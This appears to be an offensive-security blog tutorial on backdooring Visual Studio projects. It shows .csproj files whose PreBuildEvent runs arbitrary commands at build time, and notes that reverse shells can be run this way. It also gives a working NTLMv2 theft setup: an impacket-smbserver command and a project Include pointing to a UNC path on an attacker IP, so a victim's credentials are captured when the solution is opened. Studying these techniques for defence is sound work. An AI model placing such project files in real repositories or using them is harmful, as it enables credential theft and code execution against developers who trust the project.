Exploring Backdooring Techniques in Visual Studio Projects

- [[#1) Introduction|1) Introduction]] - [[#1) Introduction#1.1) Setup Visual Studio|1.1) Setup Visual Studio]] - [[#2) Exploiting|2) Exploiting]] - [[#2) Exploiting#2.1) Remote Code Execution|2.1) Remote Code Execution]] - [[#2) Exploiting#2.2) NTLMv2 Theft|2.2) NTLMv2 Theft]] ## 1) Introduction In this blog, we're going to talk about sneaky tricks that some people use with Visual Studio. This will include how they can secretly run their own code or even steal login details just by getting someone to open a Visual Studio project. We'll see how they can tinker with the build process (the steps your computer takes to turn your code into a working program), to make it do things it's not supposed to. We'll also look at a technique called NTLMv2 theft, which is a way of stealing someone's login details. This might sound complicated, but don't worry, I'll explain everything step-by-step. By the end of the post, you'll understand how these sneaky tricks work. So, whether you're a coding expert or just starting out, I hope you'll find this blog post both interesting and helpful. Let's get started! ### 1.1) Setup Visual Studio Start by running the following powershell commands to download and install Visual Studio on your windows VM: ```powershell Write-Host "[+] Installing Visual Studio Community" # Download Visual Studio Community Setup wget https://aka.ms/vs/17/release/vs_community.exe -UseBasicParsing -OutFile C:\Windows\Temp\vs_community.exe # Installing .NET Desktop Environment # https://docs.microsoft.com/en-us/visualstudio/install/workload-component-id-vs-community?view=vs-2022&preserve-view=true#net-desktop-development C:\Windows\Temp\vs_community.exe --add Microsoft.VisualStudio.Workload.ManagedDesktop --installPath "C:\Program Files\Microsoft Visual Studio\2022\Community" --addProductLang en-US --includeRecommended --passive ``` --- ## 2) Exploiting ### 2.1) Remote Code Execution One of the primary methods to execute commands during the build process is by utilizing PreBuild and PostBuild events, which are build event features in Visual Studio. These events provide the capability to run custom commands at specific stages of the build. Let's take a look at an example .csproj file: ```xml <Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <OutputType>Exe</OutputType> <TargetFramework>net6.0</TargetFramework> <ImplicitUsings>enable</ImplicitUsings> <Nullable>enable</Nullable> <PreBuildEvent>calc.exe</PreBuildEvent> </PropertyGroup> </Project> ``` In the given code snippet, we define a .csproj file, specifying the project's properties and build settings. Within the `<PropertyGroup>` element, we encounter the `<PreBuildEvent>` element, which allows us to specify a command to be executed before the build process starts. The syntax for defining PreBuild and PostBuild events follows a similar pattern: ```xml <PreBuildEvent>{command}</PreBuildEvent> <PostBuildEvent>{command}</PostBuildEvent> ``` - The `<PreBuildEvent>` element is used to define the command or series of commands that you want to execute before the build process begins. - The `<PostBuildEvent>` element is used to define the command or series of commands that you want to execute after the build process is completed. In the provided example, the command `calc.exe` is specified as the pre-build event. The PreBuildEvent and PostBuildEvent feature in Visual Studio allows you to execute any command you desire, including potentially malicious ones like PowerShell reverse shell one-liners. Example Output: ![[Pasted image 20230608175053.png]] ### 2.2) NTLMv2 Theft When it comes to stealing NTLMv2 credentials, we can exploit the `Include` parameter in the .csproj file as soon as the solution file is opened in Visual Studio. This parameter serves the purpose of specifying the file name or path of an item that should be incorporated into the project. Essentially, it allows us to determine which files, directories, or resources should be part of the project's overall structure. The `Include` parameter is commonly utilized within various elements of the .csproj file, such as `<Compile>`, `<Content>`, `<None>`, `<EmbeddedResource>`, and more, depending on the specific type of item being included. Here's an illustrative example showcasing the usage of the `Include` parameter: ```xml <ItemGroup> <Compile Include="MyClass.cs" /> <Content Include="Readme.txt" /> <None Include="Enox.txt"/> </ItemGroup> ``` You could leverage tools like [Responder](https://github.com/lgandx/Responder) or [impacket-smbserver](https://github.com/fortra/impacket/blob/master/examples/smbserver.py) to capture NTLMv2 authentication attempts. Once the solution file is opened in Visual Studio, any authentication requests made would unknowingly be directed to our attacker-controlled SMB server. By utilizing such tools, you can set up a rogue server that acts as a legitimate SMB server. When the victim's Visual Studio attempts to authenticate, the credentials are unwittingly sent to our malicious server, allowing us to capture the NTLMv2 authentication data. 1) Setting up our smbserver on attacker machine: ```bash impacket-smbserver enox . -smb2support ``` 2) Updating .csproj to following: ```xml <Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <OutputType>Exe</OutputType> <TargetFramework>net6.0</TargetFramework> <ImplicitUsings>enable</ImplicitUsings> <Nullable>enable</Nullable> </PropertyGroup> <ItemGroup> <None Include="\\172.16.128.129\enox\app.config" /> </ItemGroup> </Project> ``` The part responsible for forcing an ntlmv2 auth: ```xml <ItemGroup> <None Include="\\172.16.128.129\enox\app.config" /> </ItemGroup> ``` 3) Once the solution file is opened by the victim, we get their ntlmv2: ![[Pasted image 20230608180036.png]] - This NTLMv2 could be cracked or further relayed with help of [impacket-ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py) --- References: - https://outflank.nl/blog/2023/03/28/attacking-visual-studio-for-initial-access/ - https://www.r-tec.net/r-tec-blog-when-hackers-hack-the-hackers.html